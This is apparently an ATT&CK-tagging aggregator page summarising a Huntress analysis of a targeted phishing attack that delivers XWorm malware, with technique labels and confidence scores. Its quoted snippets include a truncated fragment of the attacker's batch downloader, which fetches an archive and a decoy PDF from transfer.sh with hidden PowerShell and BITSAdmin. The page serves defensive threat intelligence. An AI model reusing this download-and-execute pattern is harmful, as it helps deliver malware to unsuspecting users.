TTPwire Vol. 1 · MITRE ATT&CK Tagged


Huntress

Gone Phishing: An Analysis of a Targeted User Attack | Huntress

2023-08-17

ATT&CK techniques detected

11 predictions

T1566 Phishing (90%)
“Gone Phishing: An Analysis of a Targeted User Attack | Huntress. In the early days of information security, it was relatively easy to spot a phishing email in your inbox. A lot of the security awareness training available at the time did a great job of teaching users how to ident…”

T1204.002 Malicious File (83%)
“which Huntress detects as “Suspicious BITSAdmin Commonly Abused Directories”. The batch file contents appear as follows: @echo off set url=https://transfer.sh/<redacted>/mail.zip set url2=https://transfer.sh/<redacted>/w2.pdf powershell -windowsty…”

T1204.002 Malicious File (81%)
“”. As you can see, the batch file then embarks on a covert journey to: - download an archive and PDF file - open the PDF file (illustrated in Figure 2) on the user’s desktop - extract and launch the contents of the archive while the user views the PDF. The w2.pdf file appear…”

T1566.001 Spearphishing Attachment (73%)
“” at least enough to raise an alarm. Some phishing emails were also “off-topic,” having little to do with the business function of the target organization. However, the financial motivation of cybercrime has led to threat actors taking a much more targeted approach to gain ac…”

T1204.002 Malicious File (63%)
“Windows executable/malware file does not have detection results on VirusTotal, but Huntress analysts were able to determine that it is written in Golang, and contains two interesting strings: Go build ID: "5ecwtlmdcjd9y2olnmkh/umzeyupcjgz4nt8m2sqa/jv3cripsx8y1rkm3ac-v…”

T1204.002 Malicious File (55%)
“…te retrieving the executable file from the endpoint or submitting the file to automated or online analysis mechanisms. Matthew’s analysis indicated that the XWorm sample was identical in functionality to the variant described in the Trellix blog post, albeit with a different …”

T1566.001 Spearphishing Attachment (47%)
“”. As you can see, the batch file then embarks on a covert journey to: - download an archive and PDF file - open the PDF file (illustrated in Figure 2) on the user’s desktop - extract and launch the contents of the archive while the user views the PDF. The w2.pdf file appear…”

T1204.002 Malicious File (46%)
““tax_file” Windows shortcut/LNK file. At this point, all indications are that the user expects to receive zipped archives containing files related to taxes, meaning that so far, nothing appears to be amiss and no alarm bells are ringing yet. The command embedded within the w…”

T1197 BITS Jobs (37%)
“which Huntress detects as “Suspicious BITSAdmin Commonly Abused Directories”. The batch file contents appear as follows: @echo off set url=https://transfer.sh/<redacted>/mail.zip set url2=https://transfer.sh/<redacted>/w2.pdf powershell -windowsty…”

T1053.005 Scheduled Task (36%)
“…te retrieving the executable file from the endpoint or submitting the file to automated or online analysis mechanisms. Matthew’s analysis indicated that the XWorm sample was identical in functionality to the variant described in the Trellix blog post, albeit with a different …”

T1059.001 PowerShell (34%)
“which Huntress detects as “Suspicious BITSAdmin Commonly Abused Directories”. The batch file contents appear as follows: @echo off set url=https://transfer.sh/<redacted>/mail.zip set url2=https://transfer.sh/<redacted>/w2.pdf powershell -windowsty…”

Summary

Get an inside look at how threat actors use phishing and social engineering tactics to target users and infiltrate organizations.